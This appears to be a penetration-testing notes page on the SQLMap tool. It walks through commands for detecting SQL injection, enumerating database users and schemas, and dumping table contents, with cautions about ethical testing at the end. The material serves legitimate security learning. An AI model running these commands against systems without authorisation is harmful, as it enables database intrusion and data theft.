SQLMap is a powerful open-source penetration testing tool designed to automate the process of detecting and exploiting SQL injection flaws in web applications. It simplifies the identification and exploitation of SQL vulnerabilities, making it a widely used tool in the field of penetration testing.
-
Detecting SQL Injection: To use SQLMap, provide the tool with the vulnerable URL and the parameter to test for SQL injection. For example:
$ sqlmap -u "http://victim.site/view.php?id=1141" -p id --technique=UThis command tells SQLMap to test the
idparameter of a GET request forview.phpusing a Union-based SQL injection technique. -
Handling POST Parameters: If the injection involves a POST parameter, the syntax would be:
$ sqlmap -u <URL> --data=<POST string> -p parameter [options]You can write the POST string manually or copy it from a request intercepted with Burp Proxy.
-
Using Request Files: Save a request intercepted with Burp Proxy to a file and specify it on the command line:
$ sqlmap -r <request file> -p parameter [options]
-
Database Banner: The
--bannerswitch helps in grabbing the database banner to test injection and include proof of exploitability in reports:$ sqlmap -u <target> --banner <other options> -
Information Gathering:
-
List users of the database:
$ sqlmap -u <target> --users <other options> -
Check if the web application database user is a database administrator:
$ sqlmap -u <target> --is-dba <other options>
-
-
Database and Schema Extraction:
-
List all available databases:
$ sqlmap -u <target> --dbs <other options> -
Choose a database and list its tables:
$ sqlmap -u <target> -D <database> --tables <other options> -
Choose tables and list their columns:
$ sqlmap -u <target> -D <database> -T <tables, comma separated list> --columns <other options> -
Dump specific columns:
$ sqlmap -u <target> -D <database> -T <tables> -C <columns list> --dump <other options>
-
-
Forcing the DBMS: Specify the DBMS to help shorten the detection phase:
$ sqlmap --dbms=<DBMS> ...Available DBMS options include MySQL, Oracle, PostgreSQL, Microsoft SQL Server, and more.
-
Fine-Tuning Payloads: Use
--stringand--not-stringto handle changes in application output. For example:$ sqlmap -u 'http://localhost/ecommerce.php?id=1' --string "nokia" <other switches>Utilize
--prefixand--suffixfor structured POST parameters. -
Aggressiveness and Load:
- Use
--levelto test headers and increase the number of columns tested for in-band exploitation. - Use
--riskto adjust the aggressiveness of injections. Higher risk levels enable more dangerous injections.
- Use
-
Connection Management:
-
Use
--keep-alivefor persistent connections:$ sqlmap -u <target> --keep-alive <other commands> -
Use
--threadsto exploit injections with parallel threads:$ sqlmap -u <target> --technique=8 --threads 7 <other commands>
-
-
SQL Injections are powerful but can be destructive; hence, ethical hacking requires careful consideration.
-
Understanding the tools and their options is crucial for successful and responsible penetration testing.
-
SQLMap provides advanced command-line switches for fine-tuning and optimizing the exploitation process.
-
Always exercise caution to avoid damaging the client's infrastructure and follow ethical hacking practices.
A great way to find out if a SQLi vulnerability is present is to use a web proxy such as BurpSuite, capture the traffic, and save the captured file locally (.xml).
We will then open that file with SQLMap and check for vulnerabilities or not.
sqlmap -r sql_request_captured.xml {% content-ref url="https://app.gitbook.com/s/iS3hadq7jVFgSa8k5wRA/practical-ethical-hacker-notes/tools/sqlmap" %} SQLMap {% endcontent-ref %}